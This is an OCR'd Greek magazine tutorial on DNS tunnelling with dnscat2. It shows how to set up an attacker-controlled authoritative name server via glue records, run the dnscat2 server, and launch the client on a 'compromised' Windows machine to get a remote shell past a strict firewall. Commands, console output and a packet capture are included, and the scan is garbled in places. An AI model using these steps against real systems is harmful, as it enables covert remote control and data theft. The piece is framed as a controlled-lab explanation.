για επιθέσεις που πραγματοποιούνται σε δικά µας συστήµατα και υπό ελεγχόμενες 
συνθήκες. Υπάρχουν πολλοί λόγοι για να χαρεί κανείς µε την επιτυχία µιας τέτοιας 
επίθεσης, παρόλο που γίνεται σε ευνοϊκό περιβάλλον. Όταν γράφουμε κώδικα, όταν 
στήνουμε κάποια υπηρεσία ἡ όταν ολοκληρώνουμε κάποιο άλλο project, αξιοποιού- 
µε την λίγο-πολύ κατακτηµένη γνώση. Όταν όµως καταλύουµε την ασφάλεια ενός 
συστήµατος, τότε αξιοποιούµε χαρακτηριστικά διαφόρων πρωτοκόλλων, υπηρε- 
σιών και άλλων προγραμμάτων, µε τρόπους που θα ήταν δύσκολο να φανταστεί 
κανείς. Κατά κάποιον τρόπο, ανακαλύπτουμε νέες λειτουργίες και νέους πρωτότυ- 
πους τρόπους για την αξιοποίηση του εξοπλισμού µας. Αυτή ακριβώς η εξερεύνηση 
στα ópta TNG γνώσης, αποτελεί την ουσία του χάκινγκ και εἶναι λογικό va µας συναρ- 
πάζει. Σε τελική ανάλυση σκεφτείτε το εξής: H ευρηματικότητα που κρύβει ακόµα 
και η πιο απλή επίθεση, σίγουρα παρουσιάζει περισσότερο ενδιαφέρον απ’ ότι, π.χ., 
το στήσιμο ενός domain controller o' ἕνα τοπικό δίκτυο Windows. 


Η πρόκληση 


Αυτή τη φορά σκεφτόμαστε να το πάμε λίγο παραπέρα. Δεν θα καταπιαστούμε µε 
το αρχικό στάδιο µιας επίθεσης. Θα υποθέσουμε ότι έχουµε βρει ήδη έναν τρόπο 
για να εκτελέσουμε κωὠδικα σε κάποιο άτυχο σύστημα. O τρόπος αυτός καθ’ αυτός 
δεν έχει Kauia σημασία. Θα μπορούσε να εἶναι µια επίθεση Man-in-The-Middle ή το 
exploitation κάποιας δικτυακής υπηρεσίας, αλλά θα μπορούσε να εἰναι κι ένα µολυ- 
σμένο USB stick, που εξασφαλίσαµε ότι αργά ή γρήγορα θα συνδεθεί στο μηχάνημα. 
Θα προχωρήσουμε λοιπόν στο τελικό στάδιο της επίθεσης: Πώς μπορούμε va ano- 
κτήσουµε τον έλεγχο του ξένου συστήµατος; Όταν μιλάμε για έλεγχο, εννοούμε την 
απομακρυσμένη πρόσβαση στη γραμμή εντολών και κατ' επέκταση τη δυνατότητα 
να εκτελούμε προγράµµατα, να σκαλίζουµε τους καταλόγους του συστήµατος και 
να ανεβοκατεβάζουµε αρχεία. Πριν αρχίσετε να αραδιάζετε τα ονόματα διαδεδο- 
μένων backdoor, επιτρέψτε µας va θέσουμε μερικούς περιορισμούς. Κατ’ αρχάς, θα 
θεωρήσουμε ότι το σύστηµα στο οποίο έχουµε επιτεθεί προφυλάσσεται απὀ éva 
αυστηρό firewall. Το εν λόγω firewall προστατεύει όλο το τοπικό δίκτυο και µπλο- 
κάρει πολλά -δημοφιλή και ὀχι- δικτυακά ports. Επίσης δεν αντιμετωπίζει τις 
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εξερχόµενες συνδέσεις µε αφέλεια, θεωρώντας ότι εἶναι εξ’ ορισμού επιθυμητές. 
Τέλος, για να αποκλείσουµε τις κάπως αστείες λύσεις του στιλ "Κλείσε πρώτα TO 
firewall και μετά τρέξε το τάδε backdoor", θα κάνουμε µία ακόµα παραδοχή: Το αρχικό 
στάδιο της επίθεσης δεν παρέχει δικαιώµατα administrator / root. Κι επειδή παρα- 
λίγο να το ξεχάσουμε, θα θέλαμε µια λύση που να εφαρµόζεται τόσο στα Windows, 
όσο και στο Linux. 


Ζήτημα πιθανοτήτων 


Ένα πρόβλημα που έμοιαζε αρχικά απλό, φαντάζει πλέον αδύνατο να λυθεί. H αλή- 
θεια είναι ότι το παρακάναµε, αλλά όπως θα διαπιστώσετε σύντομα οι περιορισμοί 
που θέσαµε φωτογραφίζουν µια απλή λύση. Μη νομίζετε τώρα ότι παριστάνουµε 
τους έξυπνους, γιατί ούτε κι εμείς θα την σκεφτόμασταν. Ωστόσο, πρόκειται για µια 
λύση που στηρίζεται σε µια γνωστή τεχνική. 


@ Service status ἘΡ Shopping cart ΒΒ webmail English ` 


Š gandi.net 


Services Account management Billing Orders in progress Messages (3) š gandi.net 


Domains SSL Websites Simple Hosting Servers 


Domain Names > pvar.xyz » - Glue record management 


This interface allows you to manage nameservers you set up for a domain registered at Gandi, and to designate them as nameservers at the domain's 
corresponding registry using glue records. 


You may create new nameserver glue records and delete or update the IP addresses of existing server records. 
WARNING: This interface is for experienced users only. Incorrect entries will lead to interruptions in the domain's services (websites, e-mail, etc.). 


In particular, if you want to change your URL forwarding address or add the DNS of your web host, this is NOT the interface you should be using. If you 
are not sure you understand the purpose of glue records as described here, you probably don't need to use this screen. 


€— 


Nameserver (1/1) IP address L. j 
ns1.pvar.xyz 104.236.223.97 “Χ 
10 per page eA 


Register a server with the registry 


IP address È 104.236.223.97 


sa NITE 


Έχουμε συνδεθεί aro web interface rou registrar και χρησιμοποιούμε το εργαλείο 
χειρισμού των λεγόμενων glue records. Ουσιαστικά, δηλώνουμε Τα δύο ovópara 
(ns1.pvar.xyz και ns2.pvar.xyz) µε τα οποία 8a είναι γνωστός o name server µας. 
Αργότερα, χρησιμοποιώντας αυτά τα ονόματα, θα δηλώσουμε ότι ro domain pvar.xyz 
θα εξυπηρετείται από τον συγκεκριµένο name server. Με λίγα λόγια, θα τον έχουµε 
μετατρέψει σε authoritative name server yia To pvar.xyz. 
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Συνοψίζοντας ro πρόβλημα, θα λέγαμε ότι αναζητάµε µια μέθοδο αμφίδρομης επι- 
κοινωνίας µε τον στόχο, η οποία προσφέρει πρόσβαση στη γραμμή εντολών του ξέ- 
νου μηχανήματος ακόµη κι όταν δεν βρισκόμαστε στο ίδιο τοπικό δίκτυο μ' αυτό. H 
κύρια δυσκολία που αντιμετωπίζουμε σχετίζεται µε την ύπαρξη αυτού TOU ΄αυστη- 
ρού firewall", για το οποίο γνωρίζουμε ελάχιστα πλην του ότι εἰναι... αυστηρό ;) Τι εἰ- 
δους σύνδεση πρέπει να αποπειραθούµε; Μια καλή ιδέα θα ήταν να στραφούμε στις 
δικτυακές υπηρεσίες και στα αντίστοιχα πρωτόκολλα, που αξιοποιούνται ήδη από 
το ξένο σύστημα και άλλα του ιδίου δικτύου. Φυσικά, το firewall ενδέχεται να µην 
επιτρέπει *ÓAec* τις αντίστοιχες συνδέσεις. Θα μπορούσε, λόγου χάρη, va ενσωμα- 
τώνει éva whitelist και να επιτρέπει τη σύνδεση από συγκεκριμένες διευθύνσεις και 
μόνο. Σε κάθε περίπτωση, η σκέψη rou να στραφούμε ora ήδη χρησιμοποιούμενα 
δικτυακά πρωτόκολλα εἶναι απόλυτα λογική. Οι παραπάνω συλλογισμοί θα μπορού- 
σαν να γεμίσουν ολόκληρες σελίδες, αλλά δεν σκοπεύουμενασας βασανίσουµε. Με 
τα δεδοµένα που έχουµε, μόνο το πρωτόκολλο του DNS θα μπορούσε να προσφέρει 
κάποια λύση. Μήπως αναρωτιέστε γιατί το επιλέξαμε; Πρόκειται για éva πρωτό- 
κολλο που θυμόμαστε σπάνια όταν σχεδιάζουμε µια επίθεση και, ακόµα πιο σπάνια, 
όταν σχεδιάζουμε την άμυνα ενός συστήµατος. Με άλλα λόγια, η αξιοποίηση του 
DNS αποτελεί µια ύπουλη κίνηση, που έχει αυξημένες πιθανότητες επιτυχίας. Αυτό 
το επιχείρημα, όμως, θα έπειθε μόνο έναν τζογαδόρο και δεν απαντάει καθόλου στο 
πως και στο γιατί. 


ΡΝ pvar@pvar: —Iworkldnscat2Iserver = n κ 


Πριν χρησιμοποιήσουμε τον client του dnscat2 σε κάποιο μηχάνημα, 
πρέπει να έχουµε ξεκινήσει τον αντίστοιχο server. Αυτό αποτελεί 
προῦπόθεση για τη δημιουργία των DNS tunnels, μέσω των οποίων θα 
έχουµε τον έλεγχο των ξένων μηχανημάτων. Σημειώστε ότι ο server του 
dnscat2 απαιτεί δικαιώµατα root, αφού δέχεται συνδέσεις στο port 53. 
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Το πιο αθώο τούνελ 


Είμαστε σίγουροι ότι έχετε υπόψη σας την έννοια rou tunneling. Επιγραμματικά, θα 
λέγαμε ότι συνιστά τη χρήση ενός πρωτοκόλλου, για τη µεταφορά των δεδοµένων 
ενός άλλου πρωτοκόλλου. Με αυτόν τον τρόπο καταφέρνουµε να κρύψουμε µια 
σύνδεση µέσα σε µια άλλη, φαινομενικά άσχετη κι αθώα. H συγκεκριμένη τεχνική 
μπορεί να εφαρμοστεί και στην περίπτωση του DNS, οπότε κάνουμε λόγο για τη 
συγκρότηση ενός DNS tunnel. H κατασκευή τέτοιων τούνελ δεν αποτελεί δική µας 
ιδέα. Θα γνωρίζετε ίσως τα δίκτυα ΜΙΕΙ, που απαιτούν κάποιο είδος συνδρομής για 
να προσφέρουν πρόσβαση oro Internet. Τα εργαλεία που παρακάµπτουν αυτή την 
προστασία και προσφέρουν ελεύθερη πρόσβαση χωρίς συνδρομή, στηρίζονται στη 
δηµιουργία τέτοιων τούνελ. 


Στο σενάριο που εξετάζουμε, θέλουμε το κατειλημμένο μηχάνημα va επικοινω- 
vei αμφίδρομα µε το δικό µας, προσπερνώντας ro firewall. Επιπρόσθετα, θέλουμε 
να ανεβάζει και να κατεβάζει αρχεία, να εκτελεί εντολές, να αλληλεπιδρά µε το 
σύστηµα αρχείων κ.ά. Όλα αυτά προὐποθέτουν τη χρήση ενός προσαρµοσµένου 
(custom) πρωτοκόλλου, το οποίο θα επιτρέπει τον απομακρυσμένο έλεγχο του OU- 
στήµατος. Βέβαια, για να εξασφαλίσουµε ότι τα πακέτα αυτού του πρωτοκόλλου 
θα διέρχονται από το firewall ανενόχλητα, πρέπει va ra διακινούµε µέσα ATÓ κάποιο 
τούνελ. Αυτό το τούνελ, µε τη σειρά TOU, πρέπει να στηρίζεται σ ένα πρωτόκολλο 
που χρησιµοποιείται συχνά και δεν κινεί υποψίες, WOTE οι αντίστοιχες συνδέσεις 
να διέρχονται ανενόχλητες από ro firewall. Μήπως τώρα μοιάζει λογικότερη N επι- 


Em Command Prompt - dnscat2-win32.exe pvar.xyz - 0 ES 


:NdounloadsNdnscat2> 
*NdounloadsNdnscat26dnscat2-vin32.exe puar.xyz 


[ WARNING :: INPUT €v rd 

[ WARNING z: Session successfully created: 9059 

[ WARNING *: Session creation request 

[ WARNING z: Setting config: max packet length => 113 

[ WARNING zz OUTPUT: DNS tunnel to puar.xyz via 192.168.1.1:53 


Στο ρόλο του κατειλημμένου μηχανήματος χρησιµοποιήσαµε ένα σύστημα µε 
Windows. Το µόνο που χρειάστηκε να κάνουμε ήταν va εκτελέσουμµε τον client 
του dnscat2, δίνοντας ως παράμετρο ro domain µας. 
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λογή µας; Ακόμα και το πιο αυστηρό firewall του κόσμου, εἶναι σίγουρο ότι επιτρέπει 
τις συνδέσεις DNS µε "τουλάχιστον: éva name sever. Στην αντίθετη περίπτωση, η 
σύνδεση µε το Internet θα καταντούσε πρακτικά άχρηστη. 


Αρχή λειτουργίας 


Ένα πρόγραµµα που επιτρέπει τις επιθέσεις που έχουµε κατά νου µέσω DNS 
tunneling, είναι ro dnscat2 (https://github.com/iagox86/dnscat2). Πρόκειται για éva 
εντυπωσιακό εργαλείο που είµαστε σίγουροι ότι θα εκτιµήσετε κι εσείς. 


Πα να κατανοήσει κανείς το μηχανισμό του dnscat2, πρέπει να ἐχει υπόψη του ένα 
βασικό χαρακτηριστικό της λειτουργίας των name servers. Κάθε φορά που λαμβά- 
νουν ένα ερώτημα κι εφόσον δεν γνωρίζουν την απάντηση, προωθούν το σχετικό 
αίτημα σε κάποιον άλλο. Το ίδιο µπορεί να κάνει κι o επόμενος name server και πάει 
λέγοντας (αναδρομική λειτουργία). Το πρώτο µηχάνηµα σε µια τέτοια αλυσίδα δεν 
εἶναι σίγουρο ότι θα πάρει µια τελική απάντηση. Είναι πιθανό να λάβει κι ένα μήνυμα 
του τύπου "av θες va μάθεις γι αυτό ro domain, απευθύνσου στον τάδε name server". 
Σε αυτή την περίπτωση το ερώτηµα 0a προωθηθεί ξανά, προς µία νέα κατεύθυν- 
ση (διαδοχική λειτουργία). Τελικά, κάθε αίτημα DNS διέρχεται από αρκετούς name 
servers, μέχρι να βρεθεί σε κάποιον που γνωρίζειτην απάντηση. Στη χειρότερηπερί- 
πτωση, αυτή η διαδρομή τερματίζεται στον authoritative name server του εκάστοτε 
domain. Παρεμπιπτόντως, ένας name server χαρακτηρίζεται ως authoritative όταν 
γνωρίζει όλες τις αντιστοιχίες μεταξύ ονομάτων και διευθύνσεων yta TA µηχανήµα- 
τα ενός domain. Αυτή η περιγραφή µπορεί να µη βοηθάει ιδιαίτερα, αλλά αργότερα 
θα διαπιστώσετε ότι πρόκειται για κάτι πραγματικά απλό. 


Ας επιστρέψουµε τώρα στο θέµα µας. To dnscat2 έχει δύο ανεξάρτητα τμήματα: 
Έναν client και έναν server. O client τοποθετείται στο µηχάνηµα-στόχο, πίσω ATÓ το 
αυστηρό firewall, κι έχει την ευθύνη να δημιουργήσει το τούνελ, σχηματίζοντας τα 
κατάλληλα ερωτήματα DNS. Τα εν λόγω ερωτήματα αφορούν σε ανύπαρκτα (I) un- 
χανήματα, τα οποία ανήκουν o' ένα domain που έχουµε αγοράσει κι ελέγχουμε εμείς. 
Καθώς τα μηχανήματα *óev* υπάρχουν, αποκλείεται να βρεθεί κάποιος ενδιάµεσος 
name server που να γνωρίζει τις αντίστοιχες διευθύνσεις ΙΡ Έτσι, αργά ñ γρήγορα, 
τα διάφορα ερωτήματα καταλήγουν στον authoritative name server rou domain μας. 
Μόνο που σαν διαχειριστές του domain, μπορούμε να καθορίσουμε εμείς το μηχάνη- 
μα που θα έχει αυτό το ρόλο. E, λοιπόν, σ αυτό ακριβώς το σύστηµα τοποθετείται 
o server του dnscat2. Με αυτή τη διευθέτηση o client και ο server καταφέρνουν να 
επικοινωνούν µε αιτήµατακι απαντήσεις του πρωτοκόλλου DNS, κάτω από τη μύτη 
του firewall. 


Ιδιωτικός name server 


Όπως είπαμε ήδη, για va συγκροτήσουµε ro DNS tunnel θα χρειαστούµε έναν 
authoritative name server. Αυτό προὐποθέτει τη μίσθωση ενός domain name, από Ká- 
ποιον registrar που επιτρέπει στους χρήστες να δηλώνουν τα λεγόμενα glue records. 
Τώρα όµως ενδέχεται va δημιουργήσαμε νέες απορίες. 
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s: pvar@pvar: -/work/dnscat2/server We 
Starting Dnscat2 DNS server on 0.0.0.0:53 [domains - pvar.xyz]... 
Will also accept direct queries (using "--dns server-x.x.x.x,port-yyy" on the client) 


dnscat2» New session established: 9059 


Welcome to a command session! Use 'help' for a list of commands or ^z for the main menu 
SYN received in invalid state 

dnscat [command: 9059]» 

dnscat [command: 9059 ]» 


Available session commands: 
clear 
download 
exec 
help 
ping 
quit 
session 
sessions 
shell 
shutdown 
suspend 
upload 
For more information, --help can be passed to any command 
dnscat [command: 9059]» 


Μόλις συγκροτήθηκε ro DNS tunnel, δημιουργήθηκε κι ένα session 

για Τον έλεγχο του client από την κονσόλα του server. [iq τη σύνδεση 
χρησιµοποιήσαµε την εντολή session, ενώ αµέσως µετά δώσαμε ένα help 
για να δούμε τις εντολές που προσφέρει Το πρωτόκολλο του dnscat2. 


Τις περισσότερες φορές, όταν μισθώνουμε ένα domain επιθυμούμε να παραπέμπει 
σε κάποιο VPS, στο οποίο έχουµε στήσει μιαιστοσελἰδα. Επομένως,το µόνοπου µας 
ενδιαφέρει είναι η αντιστοίχιση rou domain µε τη διεύθυνση ΙΡ του συγκεκριμένου 
VPS. Πα ro σκοπό αυτό, µεταβαίνουμε oro web interface rou registrar κι επιλέγουμε 
τους name servers που προσφέρει o VPS provider. Εννοείται ότι έχουµε κάνει και κά- 
ποιες απαραίτητες ρυθμίσεις στο web control panel του VPS provider, αλλά όλες au- 
τές οι λεπτομέρειες δεν µας ενδιαφέρουν τώρα. Όσοι έχετε πραγματοποιήσει την 
ταραπάνω διαδικασία, θα θυµόσαστε ότι όταν δηλώνουμµε τους name servers στον 
registrar εισάγουµε τα ονόματά τους κι όχι διευθύνσεις ΙΡ. Αυτό δεν αποτελεί πρό- 
βληµα, αφού όλοι οι 'επἰσημοι' name servers γνωρίζονται μεταξύ τους. Όταν όµως 
θέλουμε να χρησιμοποιήσουμε έναν δικό µας name server, τα πράγματα αλλάζουν. 
Σ αυτή την περίπτωση πρέπει να επιλέξουμε éva όνοµα για rov name server και να 
TO αντιστοιχίσουµε στη διεύθυνσή του. Κάπως έτσι μπαίνουν στο παιχνίδι τα glue 
records. Πρόκειται για αντιστοιχίες μεταξύ ονομάτων και διευθύνσεων, που χρησι- 
μοποιούνται αποκλειστικά για τη δήλωση name servers. 


Πα τις ανάγκες του άρθρου αγοράσαµε TO pvar.xXxyz κι επιστρατεύσαµε ένα μικρό 
VPS, που χρησιμοποιούμε συνήθως για τα πειράματά µας (κι αυτή τη φορά έτρεχε 
τον dnscat2 server). Όπως αντιλαμβάνεστε, το συγκεκριµένο µηχάνηµα θα ἐπαιζε 
το ρόλο του authoritative name server για To pvar.xyz κι αποφασίσαμε να του δώσου- 
µε τα ονόματα nsl.pvar.xyz και ns2.pvar.xyz. Ma να πετύχουμε την αντιστοίχιση των 
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ονομάτων µε τη διεύθυνση IP του name server, μεταβήκαμε στο web interface του 
registrar (στην περἰπτωσή µας ήταν ro gandi.net) και δημιουργήσαμε τα ακόλουθα 
glue records: 


nsl.pvar.xyz διεύθυνση IP του VPS 
ns2.pvar.xyz > διεύθυνση IP του VPS 


Με αυτόν τον τρόπο γνωστοποιήσαµε στον κόσµο Órt TA συγκεκριµένα δύο ονόματα 
παραπέμπουν στη διεύθυνση IP του DNS server µας. Μετά art αυτό, πάλι από TO web 
interface του registrar, δηλώσαμε ότι ot name servers που θα εξυπηρετούν το pvar. 
xyz είναι οι nsl.pvar.xyz και ns2.pvar.xyz. Αυτό ήταν όλο! Μπορεί να µην το γνώριζε 
ο ίδιος, αλλά ο μικρός µας VPS είχε μετατραπεί σε authoritative name server για το 
pvar.xyz. 


Αναμονή για συνδέσεις 


Πα να παίξουμε µε το dnscat2 πρέπει να εγκαταστήσουµε το κομμάτι TOU προγράμ- 
ματος που λειτουργεί ως server, στον authoritative name server ενός domain. Αυτή 
η ενέργεια πρέπει να προηγηθεί της επίθεσης, αφού η λειτουργία του name server 
αποτελεί προὐπόθεση για τη δηµιουργία των DNS tunnels. Εξάλλου, από το πρό- 
γράμμα rou server θα έχουμε και τον έλεγχο του ξένου μηχανήματος. 


To dnscat2 δεν διατίθεται µε τη µορφή κάποιου πακέτου. O κὠδικάς του φιλοξενεί- 
ται σε ένα GIT repository και μπορούμε απλάνα rov κατεβάσουμε. Το πρόγραµµαπου 
αποτελεί τον server εἶναι γραμμένο σε Ruby και τρέχει σε οποιοδήποτε σύστημα 
ἐχειτον αντίστοιχο διερμηνέα. Αντίθετα, o client είναι γραμμένος σε C και µπορείνα 
μεταγλωττιστεί για το Linux ή για τα Windows. Πα τις δικές µας δοκιμές συνδεθή- 
Kape στον authoritative name server του pvar.xyz και ξεκινήσαμε εγκαθιστώντας TO 
διερμηνέα της Ruby. Από κοντά εγκαταστήσαµε κι éva πρόγραµµα διαχείρισης των 
repositories του GIT, όπως επίσης και το bundler (ένα εργαλείο διαχείρισης πακέτων 
της Ruby0): 


$ sudo apt-get update 
$ sudo apt-get install ruby-dev git 
$ sudo gem install bundler 


Αμέσως µετά δημιουργήσαμε ένα αντίγραφο του repository µε τον κώδικα TOU 
dnscat2. Όταν ολοκληρώθηκε η αντιγραφή µεταβήκαμε στον κατάλογο που είχε 
προκύψει. Εκεί συναντήσαμε έναν υποκατάλογο µε τον κώδικα TOU server κι évav 
άλλον µε τον κώδικα του client. Πα τη λειτουργία του server απαιτείται η εγκατά- 
σταση ορισμένων βιβλιοθηκών της Ruby. O δημιουργός του dnscat2 (Ron Bowes) 
έχει μεριμνήσει γι αυτό, συντάσσοντας éva αρχείο (Gemfile) που περιγράφει τα 
dependencies. Έτσι, το µόνο που κάναµε ήταν να εισέλθουµε στον κατάλογο µε τον 
κώδικα TOU Server και να εκτελέσουμε το bundle: 
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$ git clone https://github.com/iagox86/dnscat2.git 
$ cd dnscat2/server 
$ bundle install 


Σε αυτή τη φάση μπορούσαμε πλέον να ξεκινήσουμε TO server του dnscat2. Σημειώ- 
στε ότιτο πρόγραµµα αποτελεί uta υπηρεσία που δέχεται συνδέσεις στο port 53 (το 
προκαθορισμένο port του DNS). Ως εκ τούτου, η εκτέλεσή του προὐποθέτει δικαιώ- 
ματα root. Τέλος, κατά την εκτέλεση TOU server του dnscat2, πρέπει να δηλώσουμε 
και το όνοµα του domain που 8q εξυπηρετεί. Μπορεί να αποτελεί ένα εργαλείο για 
τον ἐλεγχο ξένων συστημάτων, αλλά δεν παύει να λειτουργεί σαν ένας authoritative 
name server: 


$ sudo ruby ./dnscat2.rb pvar.xyz 


Μέσα στο τούνελ 


Εφόσον o server του dnscat2 λειτουργεί κανονικά, δεν έχουμε παράνα εκτελέσουμε 
τον client στο κατειλημμένο σύστημα. Κάνοντας κάτι τέτοιο θα δημιουργηθεί au- 
τόματα ένα DNS tunnel, που θα καταφέρει να ξεγλιστρήσει ακόµα και ATÓ το πιο 
αυστηρό firewall. Μέσα απὀ αυτό το τούνελ, το dnscat2 θα συγκροτήσει éva session 
απομακρυσμµένου ελέγχου. Αν σκοπεύετε να εκτελέσετε τον Client σε κάποιο σύστη- 
μα µε Linux, πρέπει να μεταγλωττίσετε τον κὠδικα μόνοι σας. Στο δικό µας σύστη- 
μα, που λίγο νωρίτερα εἴχαμε μεταβεί στον κατάλογο µε τον κώδικα TOU server, θα 
δίναµε κάτι τέτοιο: 


$ cd ../client 
$ sudo apt-get install gcc make 
$ make 


Το τελικό προϊόν της μεταγλώττισης αποθηκεύεται στον ἴδιο κατάλογο και rtpó- 
κειται για το εκτελέσιμο ονόματι dnscat. Ακριβώς αυτό το πρόγραµµα αποτελεί το 
payload που θα πρέπει να τρέξουµε στο σύστημα-στόχο. Αν σκοπεύετε να δοκιµά- 
σετε TOV Client σε κάποιο μηχάνημα µε Windows, δεν χρειάζεται να πραγµατοποιήσε- 
τε καμία μεταγλώττιση. Μπορείτε να κατεβάσετε µια εκδοχή rou client για Windows, 
από το https://downloads.skullsecurity.org/dnscat2. Όπου κι αν κάνετε τις δοκιμές 
σας, κατά την εκτέλεση του client πρέπει να δώσετε ως παράμετρο το όνομα του 
domain. Εμείς βάλαμε στο ρόλο του θύματος ένα σύστηµα µε Windows. Έτσι, µετα- 
φέραμε σε κάποιον κατάλογο rov client του dnscat2 kat rov εκτελέσαμε ως εξής: 


dnscat2-win32.exe pvar.xyz 
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im pvar@pvar: -/workldnscat2/server x 


Εκτελώντας απομακρυσμένα ro cmd.exe, δημιουργήθηκε αυτόματα ένα νέο session. Όταν 
συνδεθήκαµε σε αυτό η κονσόλα µας μεταμορφώθηκε: Έμοιαζε σαν να είχε αποσπαστεί από 
τον server και είχε προσαρτηθεί στο μηχάνημα-στόχο, ue ra Windows! 


O client δημιουργεί éva DNS tunnel µε τον server καθώς και éva αρχικό session. Ap- 
γότερα μπορούμε να δημιουργήσουμε και πρόσθετα sessions, WOTE να εκτελούμε 
διάφορες εργασίες παράλληλα. [L αυτό το λόγο, σε καθένα από ra sessions αντι- 
στοιχίζεται ένας μοναδικός αναγνωριστικός αριθµός. Όταν ξεκινά o client εμφανίζε- 
ται éva μήνυμα που µας ενημερώνει για τον αριθµό του session που δημιουργήθηκε. 
Προφανώς, éva παρόμοιο μήνυμα εμφανίζεται και στον server. Από αυτή τη στιγµή 
και µετά μπορούμε να συνδεθούµε στο ξένο σύστημα, να μεταφέρουμε οποιοδήπο- 
τε αρχείο και να εκτελέσουµμε εντολές ñ προγράµµατα. 


Στην πορεία των δικών µας πειραµάτων, το αρχικό session που δημιουργήθηκε είχε 


τον αναγνωριστικό αριθµό 8832. Πα va συνδεθούµε σε αυτό από τον server, χρησι- 
μοποιήσαμε την εντολή session ως εξής: 


session -1 8832 


Αμέσως µετά, για να δούμε µια λίστα µε τις εντολές που υποστηρίζει το πρωτό- 
κολλο του dnscat2, δώσαμε help. Φυσικά, εφόσον ο client έτρεχε σε σύστημα µε 
Windows, δοκιµάσαμε να αλλάξουμε καταλόγους µε την εντολή cd, να αντιγράψου- 
µε αρχεία µε TO copy και να εκτελέσουμε προγράµµατα, όπως το notepad.exe κ.ά. 
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Eile Edit View Go Capture Analyze Statistics Telephony Tools Internals Help 
ee@agmalp n xml e eserTmsi[a|jə e 8 8 misa s m xi =m 


Filter: Expression... Clear Apply Save 


απ deus ο e riesce -Ἂ- e 
161 30.8536800192.168.1.104 pvar.xyz TEP 66 35384-ssh [ACK] Seq=769 Ack=929 win=2641 Len=0 Tsval=2 
162 30.9838150 192.168.1.100 192.168.1.1 DNS 87 standard query Ox3f67 TXT 5ade0138db0be4b791.pvar.xyz 
163 31.1149020 192.168.1.1 192.168.1.100 DNS 118 standard query response Ox3f67 TXT 
164 31.1918540 192.168.1.100 192.168.1.1 NBNS 110 Refresh NB ΕΧ-ΡΕΞΚΤΟΡ«ΟΟΣ 
165 31.2310370 192.168.1.104 pvar.xyz SSH 114 Client: Encrypted packet (len-48) 

166 31.3612850 pvar.xyz 192.168.1.104 SSH 114 Server: Encrypted packet (len-48) 
167 31.3614710 192.168.1.104 pvar.xyz TCP 66 35384-ssh [ACK] Seq-817 Ack-977 win-2641 Len-0 TSval-2 


168 31.4930670 192.168.1.100 192.168.1.1 DNS 88 standard query 0x965d PTR 182.169.160.108. in-addr.arp 
169 31.5485780 ash-ral-1b.sjc.drop192.168.1.100 TLSvi 331 Application Data 
170 31. 5513790 192.168.1.100 ash-rai-1b.sjc.dropTLSvi 592 Application Data, Application Data 
171 31. 6914730 ash-ral-1b.sjc.drop192.168.1.100 TCP 60 https-52140 [ACK] Seq-555 Ack-1077 win-83 Len=0 
172 32.0155050 192.168.1.100 192.168.1.1 DNS 87 standard query Ox5cib TXT icfd0138db0be4b791.pvar.xyz 
173 32.1491010 192.168.1.1 192.168.1.100 DNS 118 standard query response Ox5cib TXT 
174 32.6918510 192.168.1.100 192.168.1.1 NBNS 110 Refresh NB ΕΧ-ΡΕΞΚΤΟΡ«ΟΟΣ 
175 33.0491980 192.168.1.100 192.168.1.1 DNS 87 standard query Ox1f82 TXT 6acd0138db0be4b791.pvar.xyz 
176 33.1823660 192.168.1.1 192.168.1.100 DNS 118 standard query response Ox1f82 TXT 

.0828850 192.168.1.100 192.168.1.1 87 Standard query 0x3e21 TXT 50330138db0be4b791.pvar.Xxyz| 
178 34.1918480 192.168.1.100 192.168.1.1 NBNS 110 Refresh NB ΕΧ-ΡΕΞΚΤΟΡ«ΟΟΣ 


Œ Frame 177: 87 bytes on wire (696 bits), 87 bytes captured (696 bits) on interface 0 
& Ethernet II, Src: Giga-Byt 3f:04:df (50:e5:49:3f:04:df), Dst: zte f6:0d:50 (d8:74:95:f6:0d:50) 
& Internet Protocol Version 4, Src: 192.168.1.100 (192.168.1.100), Dst: 192.168.1.1 (192.168.1.1) 


d8 74 95 f6 Od 50 50 65 49 3f 04 df 08 00 45 00 

00 49 18 Oa 00 00 80 11 00 00 cO a8 01 64 «0 a8 

01 O1 fa Oe 00 35 00 35 83 fc 3e 21 01 00 00 01 ..... 
00 00 00 00 00 00 12 35 30 33 33 30 31 33 38 64 TES 
62 30 62 65 34 62 37 39 31 04 70 76 61 72 03 78  bObe4 
70 74 nn nn 3n nn à "mA 


Ὁ f File: "C:\Users\pvaAppData\Locai Temp)... | Packets: 194 . Displayed: 194 (100.0%) Profile: Default 


Χρησιμοποιώντας To Wireshark, ρίξαµε µια ματιά στις συνδέσεις που 
δημιουργεί o client του dnscat2. Οι λιγοστές αναφορές στο pvar.xyz 
προέρχονται από τη σύνδεση SSH που είχαμε κάνει εμείς κι όχι από το 
dnscat2. Υπό άλλες συνθήκες θα απουσίαζε κάθε αναφορά στο pvar.xyz. 

Τα αιτήματα DNS κατευθύνονται αποκλειστικά προς rov name server TOU 
τοπικού µας δικτύου (192.168.1.1) και ως εκ τούτου έμοιαζαν εντελώς αθώα. 
Μόνο η συχνότητά τους θα μπορούσε να κινήσει τις υποψίες ενός IDS. 


Περιττό να σας πούμε ότι τα πάντα εκτελούνταν κανονικά, σαν να βρισκόµασταν 
μπροστά στο μηχάνημα µε τα Windows. Ξεχωριστό ενδιαφέρον παρουσίασε η εκτέ- 
λεση του cmd.exe, που είχε σαν συνέπεια τη δηµιουργία ενός νέου session. Όταν 
συνδεθήκαµε σε αυτό µας περίμενε το τυπικό μήνυμα καλωσορίσµατος που εµφα- 
γίζειη γραμμή εντολών των Windows, όπως επίσης και το ἰδιο ro prompt. Εν ολίγοις, 
εργαζόµασταν στον server αλλά η κονσόλα έμοιαζε να ανήκει στο σύστημα µε τα 
Windows! Μπορείτε να μάθετε περισσότερα για τις εντολές και τον τρόπο χειρι- 
σμού TOU Server του dnscat2 διαβάζοντας το αρχείο README.md, που συνοδεύει τον 
κώδικα του προγράµµατος. 


Ἠρθε το τέλος µας; 


Αν παίξετε λίγο µε ro dnscat2, εἶναι σίγουρο ὁτι θα σας ενθουσιάσει. H άνεση µε την 
οποία ξεπερνά το εκάστοτε firewall είναι ασύλληπτη. Αυτό δεν σηµαίνει ότι πρόκει- 
ται για ένα εργαλείο που µπορεί να σαρώσει όλα τα συστήµατα ασφάλειας. Κάθε 
άλλο, το dnscat2 αποτελεί αυτό που ονομάζουμε "proof of concept". H ανάπτυξή του 
αποσκοπούσε µόνο στην επίδειξη µιας ιδέας: Τον απομακρυσμένο έλεγχο ενός συ- 
στήµατος, µέσα από éva DNS tunnel. O client rou dnscat2 καταφέρνει να ξεγελάσει 
